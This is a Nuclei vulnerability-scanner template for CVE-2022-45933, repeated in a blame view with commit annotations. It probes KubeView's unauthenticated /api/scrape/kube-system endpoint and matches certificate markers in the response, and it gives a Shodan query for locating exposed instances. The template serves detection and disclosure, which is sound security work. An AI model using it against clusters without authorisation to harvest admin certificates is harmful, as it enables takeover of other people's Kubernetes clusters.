nuclei-templates/cves/2022/CVE-2022-45933.yaml

id: CVE-2022-45933

info:
  name: KubeView - Information disclosure
  author: For3stCo1d
  severity: critical
  description: |
    KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."
  reference:
    - https://github.com/benc-uk/kubeview/issues/95
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-45933
    cwe-id: CWE-287
  metadata:
    shodan-query: http.title:"KubeView"
    verified: "true"
  tags: cve,cve2022,kubeview,kubernetes,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/scrape/kube-system"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'BEGIN CERTIFICATE'
          - 'END CERTIFICATE'
          - 'kubernetes.io'
        condition: and

      - type: status
        status:
          - 200
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`id: CVE-2022-45933`

			`info:`
			`name: KubeView - Information disclosure`
			`author: For3stCo1d`
Auto Generated CVE annotations [Fri Dec 2 09:11:55 UTC 2022] :robot: 2022-12-02 09:11:55 +00:00			`severity: critical`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`description: \|`
			`KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."`
			`reference:`
			`- https://github.com/benc-uk/kubeview/issues/95`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933`
Update CVE-2022-45933.yaml 2022-12-01 17:44:42 +00:00			`classification:`
Auto Generated CVE annotations [Fri Dec 2 09:11:55 UTC 2022] :robot: 2022-12-02 09:11:55 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Update CVE-2022-45933.yaml 2022-12-01 17:44:42 +00:00			`cve-id: CVE-2022-45933`
Auto Generated CVE annotations [Fri Dec 2 09:11:55 UTC 2022] :robot: 2022-12-02 09:11:55 +00:00			`cwe-id: CWE-287`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`metadata:`
			`shodan-query: http.title:"KubeView"`
Auto Generated CVE annotations [Fri Dec 2 09:11:55 UTC 2022] :robot: 2022-12-02 09:11:55 +00:00			`verified: "true"`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`tags: cve,cve2022,kubeview,kubernetes,exposure`

			`requests:`
Update CVE-2022-45933.yaml 2022-11-29 09:06:05 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/api/scrape/kube-system"`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update CVE-2022-45933.yaml 2022-11-29 09:10:50 +00:00			`- 'BEGIN CERTIFICATE'`
			`- 'END CERTIFICATE'`
Create CVE-2022-45933.yaml 2022-11-29 08:58:39 +00:00			`- 'kubernetes.io'`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`